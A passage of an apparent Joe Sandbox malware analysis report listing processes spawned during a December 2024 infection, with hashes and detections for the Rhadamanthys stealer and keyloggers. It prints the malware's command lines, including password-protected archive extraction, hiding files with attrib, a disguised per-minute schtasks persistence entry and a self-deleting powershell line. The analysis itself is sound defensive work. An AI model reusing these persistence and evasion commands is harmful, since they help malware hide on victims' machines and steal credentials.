                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:00:09:44
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe"
                                                                                                                                                                                                                                        Imagebase:0x110000
                                                                                                                                                                                                                                        File size:1'978'368 bytes
                                                                                                                                                                                                                                        MD5 hash:C29EB2D3C39A0A808F1910E0E222AC94
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000015.00000003.2737718865.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000015.00000003.2741544851.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:00:09:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000016.00000002.2756608289.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000003.2745831377.0000000004D00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000016.00000003.2741442978.0000000000880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000003.2745248461.0000000004AE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:00:09:47
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 684
                                                                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:00:09:56
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:4'438'776 bytes
                                                                                                                                                                                                                                        MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:00:09:57
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe"
                                                                                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                                                                                        File size:1'275'904 bytes
                                                                                                                                                                                                                                        MD5 hash:577CD52217DA6D7163CEA46BB01C107F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2975513113.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2975513113.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:00:10:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                        Imagebase:0x7ff663c30000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:00:10:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:00:10:01
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:mode 65,10
                                                                                                                                                                                                                                        Imagebase:0x7ff61ca50000
                                                                                                                                                                                                                                        File size:33'280 bytes
                                                                                                                                                                                                                                        MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:00:10:01
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:00:10:01
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:00:10:01
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:00:10:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:00:10:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:00:10:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:00:10:03
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                                                                                                                                                                                                                                        Imagebase:0x20000
                                                                                                                                                                                                                                        File size:765'568 bytes
                                                                                                                                                                                                                                        MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:00:10:03
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:00:10:03
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:00:10:04
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:00:10:04
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff74af00000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:00:10:04
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"in.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff775710000
                                                                                                                                                                                                                                        File size:1'827'328 bytes
                                                                                                                                                                                                                                        MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff74af00000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff74af00000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                                        Imagebase:0x7ff76f990000
                                                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:00:10:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:00:10:06
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff64e3f0000
                                                                                                                                                                                                                                        File size:1'827'328 bytes
                                                                                                                                                                                                                                        MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 67%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:00:10:07
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                                        Imagebase:0x7ff7ceaf0000
                                                                                                                                                                                                                                        File size:22'528 bytes
                                                                                                                                                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:00:10:08
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                                                                                                                                                                                                                                        Imagebase:0x20000
                                                                                                                                                                                                                                        File size:765'568 bytes
                                                                                                                                                                                                                                        MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:3.2%
                                                                                                                                                                                                                                          Total number of Nodes:757
                                                                                                                                                                                                                                          Total number of Limit Nodes:16
